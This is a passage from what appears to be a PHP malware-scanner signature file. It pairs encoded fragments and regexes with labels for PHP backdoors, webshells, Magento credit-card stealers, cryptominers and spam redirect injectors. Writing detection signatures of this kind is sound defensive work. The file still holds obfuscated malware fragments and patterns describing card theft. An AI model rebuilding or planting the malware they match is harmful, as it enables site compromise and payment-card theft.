		'JGNvbnRlbnQ9c3ByaW50ZignPElmTW9kdWxlJXNtb2RfJy4ncmV3cml0ZS5jPiVzUmV3cmknLid0ZUVuZ2lu' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.217', '(?:\$\w+\s*=\s*[^;]+?;\s*){2}@?eval\s*\(\s*base64_decode\s*\(\s*["\'][\w\/]+JGNvbnRlbnQ9c3ByaW50ZignPElmTW9kdWxlJXNtb2RfJy4ncmV3cml0ZS5jPiVzUmV3cmknLid0ZUVuZ2lu[^;]+?;'),
		'base64_decode($_POST["mysql_sync"])' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.081', NULL),
		'c3RyaXBzbGFzaGVzKGJhc2U2NF9kZWNvZGUoJF9QT1NU' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.082', '\$\w+\s*=\s*[\'"]\w+c3RyaXBzbGFzaGVzKGJhc2U2NF9kZWNvZGUoJF9QT1NU[^;]+;\s*eval\(base64_decode\(\$\w+\)\);'),
		'(\$\w+)\s*=\s*.ZXZhbChvcGVuc3NsX2RlY3J5cHQo[^;]+;\s*eval\(base64_decode\(\1\)\)\s*;' => array(REX_CLEARFILE, 'php.backdoor.uploader.214', NULL),
		'RmlsZXNNYW4' => array(STR_CLEARFILE, 'php.backdoor.filesman.080', NULL),
		'\$[\w]+[\s]*=[\s]*<<<EOT[^;]+EOT;[\s]*eval' => array(REX_CLEAR_MULTIMATCH, 'php.spam-seo.injector.270', '\$[\w]+[\s]*=[\s]*<<<EOT[^;]+EOT;[\s]*eval[^\(]+\([\s]*base64_decode[^(]*\([^;]+\)[\s]*;'),
		'ZXZhbChzdHJyZXYoICc7KSkgIjdrU0tnY1NaMkZHYm9NSGR5OWxjdlJYTXpnQ0lud2x' => array(STR_CLEARFILE, 'php.backdoor.filesman.113', NULL),
		'trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256, md5($secret), base64_decode($string), MCRYPT_MODE_CBC, md5(md5($secret))));' => array(STR_CLEARFILE, 'php.hacktool.generic.026', NULL),
		'\^[\s]*\$[\w]+\{\$[\w]+\};[\s]*return[\s]*\$[\w]+;[\s]*\};[\s]*eval\([\w]+\(base64_decode\(.[^\)]+\),' => array(REX_CLEARFILE, 'php.malware.redirect.026', NULL),
		'5b1rexo3EzD82fkV8pa7Cw3GgJM0NYYcHDtxmtipD0maOA9dYIGtF5buLsZO6v' => array(STR_CLEARFILE, 'php.backdoor.filesman.089', NULL),
		'CmlmKCFkZWZpbmVkKCJQSFBfRU9MIikpCnsKICAgIGRlZmluZSgiUEhQX0VPT' => array(STR_CLEARFILE, 'php.backdoor.uploader.224', NULL),
		'7X1td9rIkvDn+eD5DdwIK4AhNjYCgxMYZ5zJ6zzXuZNN7MWzIBhZgFAsjEYan' => array(STR_CLEARFILE, 'php.backdoor.filesman.087', NULL),
		'pRj7U+O88Wc60//BZFxs3/kSx3mRAwM336Xf9830Hs3lOu0Al1F' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.injector.114', 'eval\(gzinflate\(base64_decode\(.pRj7U\+O88Wc60\/\/BZFxs3\/kSx3mRAwM336Xf9830Hs3lOu0Al1F[^\)]+\)\)\);'),
		'ZWNobyAnPGh0bWw+PGhlYWQ+PHRpdGxlPicuZ2V0ZW52KCJIVFRQX0hPU1QiKS4nI' => array(STR_CLEARFILE, 'php.backdoor.webshell.131', NULL),
		')){define("\x43\x59\x42\x45\x52\x31\x37\x33' => array(STR_CLEAR_MULTIMATCH, 'php.defaced.encrypted.002', '\/\*\s*cyber\w+\s*\w+\s*\*\/\s*if\(\(preg_match\(base64_decode\(.L2V2YWwvCg==.\),file_get_contents\(__FILE__\)\)\)[^"]+..x43.x59.x42.x45.x52.x31.x37.x33[^;]+;define\([^\)]+\);define\([^\}]+\}function[^\{]+\{return\s*base64_decode\([^\.]+\.preg_replace[^>]+>\$is\(eval\([^;]+;\}function[^>]+>\$cyber[^;]+;\s*\/\*[^\*]+\*\/\s*\/\*\s*by[^\*]+\*\/'),
		'7b3rdts4syD6f9aad6DZ/ppSR5Yl2U4ntuXE8S1OHNvxJc51qymKk' => array(STR_CLEARFILE, 'php.backdoor.filesman.083', NULL),
		'str_rot13(\'=RDe1Za8XXAI1A9vlESqYAcHlB5FXFIqmeVI1' => array(STR_CLEARFILE, 'php.malware.strrev.009', NULL),
		'FVbFDuwIDvyceU99CJPmFGbmXFZhTofp67fn4Jtl2eVylcszHf7U' => array(STR_CLEARFILE, 'php.spam-seo.injector.244', NULL),
		'7X1rcxs5kuBnd0T/B7ia3STHfMpv0ZQt62G7bUtqS7bbLSkYRVaR' => array(STR_CLEARFILE, 'php.backdoor.c99-shell.005', NULL),
		'\);[\s]*eval\(\$[\w]{200}' => array(REX_CLEARFILE, 'php.backdoor.filesman.092', NULL),
		'7X39d9o6EujP2XP2f1C97DXcEgKk7W1DSJrvkKZJ' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.webshell.142', 'eval\(gzinflate\(base64_decode\(.\s*7X39d9o6EujP2XP2f1C97DXcEgKk7W1DSJrvkKZJ[^\)]+\)\s*\)\s*\)\s*;'),
		'?>" . base64_decode("Z2lm' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.base64.009', 'eval\([\'"]\s*\?>\s*[\'"]\s*\.\s*base64_decode\([\'"]Z2lmO[^;]+;'),
		'protected by MessPHP v' => array(STR_CLEARFILE, 'php.hacktool.lombokcyber_encoder.001', NULL),
		'<\?php[\s]*\$[0O]{3,}[\s]*=[\s]*base64_decode\(.[\w]{30,}.\);[\s]*\$[0O]+[\s]*=[\s]*\$[0O]+\{[\d]+\}[\s]*\.[\s]*\$[0O]+\{[\d][^\(]+eval\([\s]*\$[0O]' => array(REX_CLEAR_MULTIMATCH, 'php.malware.obfuscated.020', '<\?php[\s]*\$[0O]{3,}[\s]*=[\s]*base64_decode\(.[\w]{30,}.\);[\s]*\$[0O]+[\s]*=[\s]*\$[0O]+\{[\d]+\}[\s]*\.[\s]*\$[0O]+\{[\d][^\(]+eval\([\s]*\$[0O][^\'"]+\([\s]*[\'"][\w\+\=]{500}[^;]+\);[\s]*\?>'),
		'@eval\("[^"]+"[\s]*\.[\s]*base64_decode\("[^;]{5000}' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.webshell.157', '@eval\("[^"]+"[\s]*\.[\s]*base64_decode\("[^;]{5000}[^;]+\);'),
		'(gzinflate(base64_decode(str_rot13("7Y17qlWUm' => array(STR_CLEARFILE, 'php.backdoor.webshell.159', NULL),
		'WSO SHELL' => array(STR_CLEARFILE, 'php.backdoor.WSO.012', NULL),
		'ziugfxojvn\');@eval(@gzuncompress(' => array(STR_CLEARFILE, 'php.backdoor.filesman.109', NULL),
		'x6ck\x64G\x67\x36I\x47F\x31d\x47\x38\x37\x49\x6a' => array(STR_CLEARFILE, 'php.backdoor.webshell.166', NULL),
		'rVdbc6PKEX5WqvIfxirKgI0Bobtl7N06q5yzlex6I8vJg61VYRgkdhFwBvD' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.frmDs-injector.007', 'eval[\s]*\([\s]*gzinflate[\s]*\([\s]*base64_decode[\s]*\([\s]*.rVdbc6PKEX5WqvIfxirKgI0Bo[^;]+\)[\s]*;'),
		'LZfHDqRaEkQ/53WLBd5pVhSewnvYjPDee75+6kmzQIA' => array(STR_CLEARFILE, 'php.hacktool.symlink_bypass.005', NULL),
		'eval(\'?>\'.base64_decode($thanks));' => array(STR_CLEARFILE, 'php.backdoor.webshell.189', NULL),
		'7b17e9s4rjj899nnOd+B1WRH9tRxbCfpxYmdprk1bZq2ubSdNv1lZU' => array(STR_CLEARFILE, 'php.backdoor.filesman.118', NULL),
		'7P1pW+NIsgCMfr7zPPMfVB6mCwbjDbMVBd3yBgZsY5vNrqqXkS1ZFl' => array(STR_CLEARFILE, 'php.backdoor.c99-shell.008', NULL),
		'$url=base64_decode("aHR0cHM6Ly9wYXN0ZWJpbi5j' => array(STR_CLEARFILE, 'php.backdoor.webshell.194', NULL),
		'base64_decode($jembot)' => array(STR_CLEARFILE, 'php.backdoor.webshell.173', NULL),
		'LnBhc3RlLnNlL3Jhdw==' => array(STR_CLEARFILE, 'php.backdoor.curl.015', NULL),
		'5b14ShvH0ij82Xut/R+GiZKRbyEkbns' => array(STR_CLEARFILE, 'php.backdoor.filesman.126', NULL),
		'Hf6Q3JoEf9inR4wsC2jG4sLpGTJnP60PLnsRvK9OQe' => array(STR_CLEARFILE, 'php.backdoor.filesman.125', NULL),
		'CBBDHBFEREMLGFgMXFVKS01WAkgfVh1dV0pPVgtLIXIIHw' => array(STR_CLEARFILE, 'php.malware.generic.087', NULL),
		'($_FILES[base64_decode(chr(' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.047', NULL),
		'ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKCm' => array(STR_CLEARFILE, 'php.backdoor.filesman.127', NULL),
		'bWVtb3J5X2xpbWl0IiwtMSk7CgoKJGxlYWZbJ3ZlcnNpb24nXT' => array(STR_CLEARFILE, 'php.phishing.mailer.118', NULL),
		'rVqJUttIGn4VxcWM7C0H+tDRHQI1siXtGDBkwUw2E1IuHS1sYmxjyQaz' => array(STR_CLEARFILE, 'php.spam-seo.injector.323', NULL),
		'eval(\'?>\'.base64_decode(\'PD9waHANCkBzZXNzaW9uX3N0YXJ0KCk7DQpAc2V0X3RpbWVfbGltaXQoMCk7DQoN' => array(STR_CLEARFILE, 'php.backdoor.filesman.132', NULL),
		'// WHO SHELL' => array(STR_CLEARFILE, 'php.backdoor.webshell.213', NULL),
		'(\$[\w]+[\s]*=[\s]*base64_decode\([^\)]+\);[\s]*){3,}eval\([^;]+\);' => array(STR_CLEARFILE, 'php.backdoor.webshell.214', NULL),
		'a3Nlc19zdHIgPSBzdHJfc' => array(STR_CLEARFILE, 'php.backdoor.create_function.016.03', NULL),
		'eval(gzinflate(base64_decode(\'FZvHkoPKskU/554TDPAuXtwBAuG9h8kNPA' => array(STR_CLEARFILE, 'php.malware.obfuscated.050', NULL),
		'CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2' => array(STR_CLEARFILE, 'php.hacktool.mailer.159', NULL),
	),

	'eval(function(p,a,c,k,e,' => array(STR_TRIGGER, 
	
		'parseInt(c/a)))+((c=c%a)' => array(STR_TRIGGER,
	
			'|onload' => array(STR_TRIGGER,
				'|appendChild' => array(STR_TRIGGER,
	
					'|jQuery' => array(STR_TRIGGER,
						'|adsadsgg' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.049','eval\(function\(p,a,c,k,e,d[^"]+""[^|]+\|\|[^|]+[^@]+\|adsadsgg[^{]+\{}\)\);?'),
					),
	
					'aHR0cDovL3dpbGRlc3RvcmUuYml6L2dhdGUucGhw' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.050', 'eval\(function\(p,a,c,k,e,d\)\{\w=function\(\w\)\{return\(\w<\w\?[^>]+>\d+\?String\.fromCharCode\([^\}]+\};if\(\![^>]+>\d&&\(\d==[^:]+:\d!=[^>]+>\d&&[^>]+>\d&&[^>]+>\d&&\([^>]+>\d&&\([^\;]+;[^&]+&&[^\}]+\};\s*.,[^\|]+\|\|\|id\|length\|value\|push\|onchange\|function\|\|\|[^\']+\'\.split\(\'\|\'\),\d,\{\}\)\)'),
					'NPRak9QU4lFBSneFt' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.003', '<script\s*type=[^>]+>eval\(function[^:]+:\w\(parseInt\(\w.\w\)\)\)[^;]+;if\(!..\.replace[^;]+;\w=\[function\([^;]+;\w=function\(\)\{return[^\}]+\};\w=\d\};[^;]+;return\s*\w\}\([^\}]+\},\w\)\}\w\.\w=\w\(\w\(\)\{\w\(\)\},\w\);[^\|]+\|\|\|\|[^\'"]+.\.split\(.\|.\),\d,\{\}\)\)<.script>'),
				),
			),
	
			'String.fromCharCode(' => array(STR_TRIGGER,
	
				'|btoa|' => array(STR_TRIGGER,
					'|_cc_number|' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.107', 'eval\(function\(p.a.c.k[^\n]+_cc_number\|[^;]+\{\}\)\);'),
				),
	
				'|onestepcheckout|' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.119', 'eval\(function\(p,a,c,k,e,d\)[\s]*\{[\w]+[\s]*=[\s]*function[\s]*\([\w]+\)[\s]*\{[\s]*return\([^;]+toString\([\d]+\)[\s]*\)[\s]*\};[\s]*if\(\![^\{]+\)\)[\s]*\{[\s]*while[\s]*\([^;]+function\([\w]+\)[\s]*\{[\s]*return[\s]*[\w]+[\s]*\[[\w]+\][\s]*\}[\s]*\];[^&]+&&[\w]+\.[\w]+!=[^\|]+option\|\|\|[^;]+\.split\(.\|.\),[\d]+,\{\}[\s]*\)[\s]*\);'),
			),
	
			'=rand(' => array(STR_TRIGGER,
				'|strpos($url,\'.bing.\')||strpos($url,\'.yahoo.\')){' => array(STR_TRIGGER,
					'{echo "<script type=\"text/javascript\"> window.location.href=' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.iframer.004', '\$url[\s]*=[\s]*\$_SERVER..HTTP_REFERER..;[\s]*if.strpos\(\$url...google.....strpos........bing.....strpos........yahoo[^;]+rand\([^;]+;[\s]*if[^;]+echo[\s]*.<script[\s]*type[^>]+>eval.function.p.a.c.k.e.d.[^@]+window.location.href[^}]+\}\};'),
				),
			),
	
			'var|x44|x4A' => array(STR_TRIGGER,
				'5fd2x6' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.048', 'eval\(function\(p,a,c,k,e,d\)\{e=function\(c\)\{return\(c<a...:e\(parseInt[^}]+};if\(!...replace[^}]+}.=\[function\(e\)\{return[^"]+.[^;]+;1k\(U\(V,W,y[^}]+};1h\(!D[^_]+_0x5fd2x3[^.]+.split\(\'\|\'\),0,\{\}\)\);'),
			),
	
			'|fromCharCode|if|64|z0|Za|write|do|base64test|document|unescape|' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.046', '<script>[\s]*eval.function.p.a.c.k.e.d.\{[^<]+<[^<]+<<[^\']+.[^>]+\|fromCharCode\|if\|64\|z0\|Za\|write\|do\|base64test\|document\|unescape\|[^}]+\{\}\)\)[\s]*<.script>'),
			'iframe|document|top|innerHTML|body|www|http|xyz|wintercomo|src' => array(STR_CLEARFILE, 'js.spam-seo.japanese-spam.001', NULL),
			'paypal_direct_cc_cid|ct|zp|fln|ad|authorizenet_cc_cid' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.033', 'Ajax\.Responders\.register\(Varien\.GlobalHandlers\);\s*eval\(function\(p,a,c,k,e,d\){\w+=function\(\w+\){return\([^}]+};if\(\!\'\'\.replace\([^;]+;\w+=function\(\){return\'..w\+\'};\w+=\d+};while\(\w+\-\-\){if\(\w+\[\w+\]\){\w+=\w+\.replace\(new\s*RegExp\([^}]+}}return\s*\w+}[^@]+\|document\|\|\|getElementById\|value\|billing\|cn\|length\|cvv\|if\|\|st\|cem\|cey\|region\|se\|\|paypal_direct_cc_cid\|[^,]+,\d+,{}\)\);'),
			'|document|com|en|terms|b1xz6cku|cookie|' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.033', '<script[^>]+>eval\(function\(p,a,c,k,e,d\){\w+=function\(\w+\)\s*{return\([^\.]+\.fromCharCode\([^}]+};if\(\!..\.replace\(\/\^\/,String\)\){while[^@]+\|[documentcomcookieb1xz6cku]+[^\.]+\.split\([\'"]\|[\'"]\),\d+,{}\)\)<.script>'),
			'replace|_cc_number|else|lastname|firstname|_expiration_yr' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.044', 'eval\(function\(p,a,c,k,e,d\)\s*{\s*\w+=function\(\w\)\s*{\s*return\([^}]+}\s*;\s*if\(\![\']{2}\.replace\([^\2]+replace\|_?cc_number[^\.]+\.split\(\'\|\'\)\s*,\s*(?:\d+,)?{}\)\)\s*;'),
			'window|open|orientation|function|var|null|Firebug|module|sloaded|atob' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.056', 'eval\(function\(p,a,c,k,e,r\)[\s]*\{[\w]*=function\([\w]*\)[\s]*\{return[^;]+\.toString\([\d]*\)\)\};[^;]+\|\|[\w]*\([\w]*\);[\w]*=\[function\([\w]*\)\{return[^|]+\|\|!\([\d]*[^;]+\)\);[^|]+\|\|window\|open\|orientation\|function[^\{]+\.split\(.\|.\),[\d]*,\{\}\)\)'),
			'function|return|while||replace|if|17|toString||new|||RegExp' => array(STR_CLEAR_LINEMATCH, 'js.malware.redirect.020', 'eval\(function\(p,a,c,k,e,r\)[\s]*\{[\w]*=function\([\w]*\)[\s]*\{return[^;]+\.toString\([\d]*\)\)\};[^;]+\|\|[\w]*\([\w]*\);[\w]*=\[function\([\w]*\)\{return[^|]+\|\|[\w]+\([\w]+\);[^}]+\]\}\];[^;]+\};[\w]+=[\d]+\};[^{]+\(\)\{[^\{]+,\{\}\)\)[^\{]+RegExp\|String\|eval\|\|var\|document\|script[^\}]+\|split.\.split\(.\|.\),[\d]+,\{\}\)\)'),
		),
	
		'|document|' => array(STR_TRIGGER,
	
			'replace(new RegExp' => array(STR_TRIGGER,
				'|http' => array(STR_TRIGGER,
					'|href' => array(STR_TRIGGER,
						'document|location|href' => array(STR_CLEAR_MULTIMATCH, 'js.malware.redirect.021', 'eval\(function\(p,a,c,k,e,r\)[\s]*\{[\w]+=function\([\w]+\)[\s]*\{[\s]*return[\s]*[\w]+\.toString\([\d]+\)[\s]*\};[\s]*if\([^\}]+\}\];[\s]*[\w]+=function\(\)[\s]*\{[\s]*return[^\@]+return\|if\|replace\|\|while\|new.\.split\(.\|.\),[\d]+,\{\}\)\);'),
					),
				),
				
				'|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|117|head||appendChild|addEventListener' => array(STR_CLEAR_MULTIMATCH, 'php.malware.redirect.043', 'eval\(function\(p,a,c,k,e,d\)\{\w=function.\w..return.\w\.toString.\d+\)\};if\(!\'\'\.replace\(.\^.,String\)\)\{while.[^D]*DOMContentLoaded\|function\|if\|typeof\|undefined[^\']*\'\.split\(\'\|\'\),\d,\{\}\)\)\;'),
			),
	
			'|is|' => array(STR_TRIGGER,
				'|gd|' => array(STR_TRIGGER,
					'|write|document|' => array(STR_CLEAR_MULTIMATCH, 'js.malware.generic.027', '(?:\neval\(function\(p,a,c,k,e,d\)[^;]+;if\(!..\.replace[^;]+;[^\|]+\|(?:document\||write\||src\||type\||script\||text\|){3}(?:\w+\|){0,5}\w+.\.split\(.\|.\),0,\{\}\)\))+'),
				),
			),
	
			'|js|document|_0xf' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.006', 'eval\(function\(p,a,c[^\{]+\{e=function\((\w)\)\{return\s*\1\};if\(!..\.replace[^-]+--\)\{\w\[\1\]\=\w\[\1\]\|\|\1\}\w=\[[^;]+\;\w=function\(\)\{return...w\+.\};[^\|]+\|_0x\w+\|js\|document\|_0x[^\']+\'\.split\(.\|.\),\d,\{\}\)\)'),
			'|script|appendChild|cn|' => array(STR_CLEAR_LINEMATCH, 'js.malware.t_cn.001', 'eval.function.p,a,c,k,e,.+?\|script\|appendChild\|cn[^\.;]+\.split..\|..,0,\{\}\)\);'),
			'|ame|write|document|s|rc' => array(STR_CLEAR_LINEMATCH, 'js.malware.generic.025.02', 'eval.function.p,a,c.+ame\|write\|document\|s\|rc[^<]+?0,\{\}\)\)'),
			'|element|document|iframe|cumba|innerHTML|var|src|http|' => array(STR_CLEAR_LINEMATCH,'js.spam-seo.injector.023', 'eval.function.p,a,c,k,e,r[^|]+\\|\\|[^|]+\\|[^;]+0,\\{\\}\\)\\);'),
			'|var|j||length|if|getElementsByTagName|document|for|v|||ne||display|no|style|className|' => array(STR_CLEAR_LINEMATCH,'js.spam-seo.hidden-style.011', '<script>eval.function.p,a,c,k,e,d[^|]+\\|[^>]+document.for.v...ne..display.no.style.className[^>]+<.script>'),
			'eval|document|write|String|fromCharCode' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.040', '<script[^>]?>\s*eval\(function\(p,a,c,k,e,r\){e=function\(\w+\){return[^{]+{while[^{]+{return[^{]+{return\'..w\+\'};[^}]+};while[^;]+;return\s*\w+}\([^;]+;[\'"].\d+,\d+,[\'"][(\d+\|\s*evaldocumentwriteStringfromCharCode)]+[\'"]\.split\(\'\|\'\),\d+,{}\)\)\s*<.script>'),
		),
	
		'return c.toString(' => array(STR_TRIGGER,
	
			'|document|fromCharCode|String|eval|write|' => array(STR_TRIGGER,
				'<div class="' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.hidden-style.012', '<script type=.text.javascript.>[\s]*eval.function.p,a,c,k,e,d[^<]+\|document.fromCharCode.String\|eval\|write[^<]+\{\}\)\)[\s]*<.script>[\s]*<div class="[\w]+">[^%]+?<.div>'),
			),
	
			'|userAgent|' => array(STR_TRIGGER,
				'echo "<noindex><script id=' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.052', 'add_action\(.wp[^,]+,[\s]*.([\w]+).\);[\s]*function \1\(\)[\s]*\{[\s]*echo .<noindex><script id=[^\*]+noindex>.;[\s]*\}'),
			),

			'<tag' => array(STR_CLEAR_MULTIMATCH, 'js.malware.generic.008', '<tag\w{10}><.tag\w{10}><script>eval.function.p,a[^>]+>.;[^\|]+.var[^;]+script><tag\w{10}><.tag\w{10}>'),
			'innerHTML|iframe|width|100|scrolling|no|document|4000|frameborder|src|http|' => array(STR_CLEAR_LINEMATCH, 'js.malware.iframe_injector.004', 'eval.function.p,a,c,k,e,r(?:[^\|]+?\|+){2,12}innerHTML\|iframe\|width\|100\|scrolling\|no\|document\|4000\|frameborder\|src\|http\|[^\}]+?\}\)\)'),
			'javascript|encodeURI|src||write|http' => array(STR_CLEAR_LINEMATCH, 'js.malware.redirect.015', 'eval\(function\(p,a,c,k,e,d\)\s*{\w=function\(\w\)\s*{\s*return\s*\w\.toString\(\d+\)\s*}\s*;\s*if\(\!..\.replace\(\/\^\/,String\)\)\s*{\s*while\(\w--\)\s*{\w\[\w\.toString\(\w\)[^{]+{\s*return\s*\w\[\w\]\s*}\s*\]\s*;\s*\w=function\(\)\s*{\s*return.\\\\\\\\w\+.\s*}\s*;\w=\d+\s*}\s*;\s*while\([^{]+{\s*if\([^{]+{\s*\w=\s*\w\.replace\(\s*new\s*RegExp\([^;]+;\s*\w+\s*\w?=[^\0]+document[(?:\|\w)]+\'\.split\(\'\|\'\),\d+,{}\)\)'),
		),
	
		'|iframe|' => array(STR_TRIGGER,
	
			'userAgent' => array(STR_TRIGGER,
				'indexOf' => array(STR_TRIGGER,
					'iPhone' => array(STR_TRIGGER,
						'|maxTouchPoints' => array(STR_CLEAR_MULTIMATCH,'js.spam-seo.redirect.014', '.\*[\w]{20,}\*.[\s]*eval.function.p,a,c,k,e,d[^\*]+maxTouchPoints[^\*]+split.....,0,\{\}\)\)[\s]*.\*[\w]{20,}+\*.'),
					),
				),
			),
	
			'999px' => array(STR_TRIGGER,
				'|atob|' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.031', 'eval\(function\(p,a,c,k,e,d[^\^]+(\|iframe\||999px\|)?[^;]+\|atob\|[^;]+(\|iframe\||999px\|)[^;]+(\|iframe\||999px\|)?[^;]+random..split[^;]+\);'),
			),
			
			'content="Replica' => array(STR_CLEARFILE, 'html.spam-seo.replica-doorway.001', NULL),
		),
	
		'|052F|' => array(STR_TRIGGER,
	
			'|Edge|' => array(STR_TRIGGER,
				'|v750|' => array(STR_TRIGGER,
					'|addEventListener|' => array(STR_CLEAR_MULTIMATCH, 'js.malware.visitor_tracker_052F.003', '(\/\*\w{15,}\*\/)?eval.function.p,a,c,k,e,d.\{e=[^\*]+?\|052F\|[^\*\/]+?0,\{\}\)\)\s*(\/\*\w{15,}\*\/)?'),
				),
			),
	
			'|chrome|052F|iPhone|' => array(STR_CLEAR_MULTIMATCH, 'js.malware.visitor_tracker_052F.002', '(\/\*\w{15,}\*\/)?eval.function.p,a,c,k,e,d.\{e=[^\*]+?chrome\|052F\|iPhone[^\*\/]+?0,\{\}\)\)\s*(\/\*\w{15,}\*\/)?'),
		),
	
		'|x6d' => array(STR_TRIGGER,
			'|x6f' => array(STR_TRIGGER,
				'|window' => array(STR_TRIGGER,
					'|var' => array(STR_TRIGGER,
						'\[\d\$\[0\]\]\[\d\$\[1\]\]\(\d\$\[2\]\)\[\d\$\[3\]\]\[\d\$\[4\]\]=\d\$\[5\]' => array(REX_CLEAR_MULTIMATCH, 'js.spam-seo.hidden-style.014', '<div id="[\w]+">[\s]*<a href=[^\n]+[\s]*<a href[^\n]+[\s]*<a href=[^\(]+<script>[\s]*eval\(function\(p.a.c.k.e[^#]+?\.split\(...\)...\{\}\)\)[\s]*<.script.[\s]*<.div>'),
					),
				),
			),
		),
	
		'|style|' => array(STR_TRIGGER,
			'|display|' => array(STR_TRIGGER,
				'|none' => array(STR_TRIGGER,
					'6,6,.document\|getElementById\|[\w]+\|style\|display\|none.\.split' => array(REX_CLEAR_MULTIMATCH, 'js.spam-seo.hidden-style.014.02', '<div id="[\w]+">[\s]*<a href=[^\n]+[\s]*<a href[^\n]+[\s]*<a href=[^\(]+<script>[\s]*eval\(function\(p.a.c.k.e[^#]+?\.split\(...\)...\{\}\)\)[\s]*<.script.[\s]*<.div>'),
				),
			),
		),
	
		'|yadro|' => array(STR_TRIGGER,
			'|ontv|' => array(STR_TRIGGER,
				'e=function(c){return(' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.063', 'eval\(function\(p.a.c.k.e.d[^\}]+\.toString\([\d]*\)\)\};[^\{]+String\)\)\{while\([^;]+\]\}\];[\w]*=function\(\)\{return[^\|]+[\w]+\|([\w]+\||\|)*yadro([\w]+\||\|)*ontv([\w]+\||\|)*[\w]+.\.split\(.\|.\),[\d]*,\{\}\)\)'),
			),
		),
	
		'street2|city|paypal_direct_cc_number' => array(STR_TRIGGER,
			'|authorizenet_expiration_yr|authorizenet_expiration|firstname|' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.022', 'eval.function.p,a,c,k,e,d[^@]+postcode\|paypal_direct_expiration\|[^;]+0,\{\}\)\);'),
		),
	
		'+$3.0$+' => array(STR_TRIGGER,
			'1$1+\\\\\\\\\\\\' => array(STR_CLEARFILE, 'js.malware.cryptominer.017', NULL),
		),
	
		'<script data-cfasync=\'false\' type=\'text/javascript\'>' => array(STR_TRIGGER,
			'|clickund_expert' => array(STR_CLEAR_MULTIMATCH, 'js.malware.unwanted-ads.013.02', '<script[^>]*>[\s]*eval.function.p,a,c,k,e[^}]+\};if[^\2]+clickund_expert\|[^{]+\{\}\)\)[\s]*<.script>'),
		),
	
		'|biso|' => array(STR_TRIGGER,
			')){window.location.href="http:' => array(STR_CLEAR_LINEMATCH, 'js.redirect.window_location.011', 'eval\(function\(p.a.c.k.e.r[^>]+document\.referrer;if\([^\{]+\{window\.location\.href="htt[^\)]+split\([^\}]+\{\}\)\);?'),
		),
	
		'_0x1386|_0xd10fx3' => array(STR_CLEAR_MULTIMATCH, 'js.malware.unwanted-ads.013', '<scrip[^>]+>\s*eval\(function\(p,a,c,k,e,d\)\s*{\w=function\(\w\)\s*{return\([^\}]+}\s*;\s*if\(\!..\.replace\(\/\^\/,String\)\)\s*{while\([^<]+_0x1386\|_0xd10fx3\|[^<;]+\{\}\)\)\s*<\/script>'),
		'window|x76|x78|x2d|x2e|x6b|x23|x79|x7a' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.iframe-doorway.004', '<script type="text.javascript">eval.function.p,a,c,k,e,d.+x65.x74.x69.x6f.x72.x64.x6e.x30.x6c.x77.x63.x3a.x20.x3d.x66[^>]+\\{\\}\\)\\)<.script>'),
		'x72|eval|x64|x61|x6c' => array(STR_CLEAR_LINEMATCH, 'js.malware.oxxtm.001', 'eval.function.p,a,c,k,e,d[^70]+?7..4..e[^v]+val.x64.x61[^\)]+\),0,\{\}\)\);'),
		'if|parseInt|detectIE|iframe|' => array(STR_CLEAR_LINEMATCH,'js.malware.generic.007','eval.function.p,a,c.+?if\|parseInt\|detectIE\|iframe\|[^;]+?\{\}\)\)'),
		'weightlossmaxer|location' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect.008', '<script[^>]*>eval.function.p,a,c.+?\'\|[^<]+\|weightlossmaxer[^<]+<.script>'),
		'Python|cache|inurl|45|31|30|while' => array(STR_CLEAR_LINEMATCH, 'js.malware.generic.023', '<script>eval.function.p.a,c,k,e,d[^\n]+x74\|x72\|35\|x69\|navigator[^>]+Python\|cache\|inurl\|45\|31\|30\|while..split[^>]+script>'),
		'_gfsf_uu_getbyte|cookie|indexOf|push' => array(STR_CLEAR_LINEMATCH, 'js.malware.generic.025', 'eval.function.p,a,c.+_gfsf_uu_getbyte\|cookie\|indexOf[^<]+?0,\{\}\)\)'),
		'|tongjii|' => array(STR_CLEAR_LINEMATCH,'js.spam-seo.injector.021', 'eval.function.p,a,c,k,e,\w.\{[^\n]+\|tongjii\|[^\']+\'.split.....,0,..\)\)'),
		'vuitton|width|html|' => array(STR_CLEAR_LINEMATCH,'js.spam-seo.injector.031', 'eval.function.p,a,c,k,e,d[^|]+\\|[^>]+>[^}]+vuitton\\|width[^}]+\\{\\}\\)\\)'),
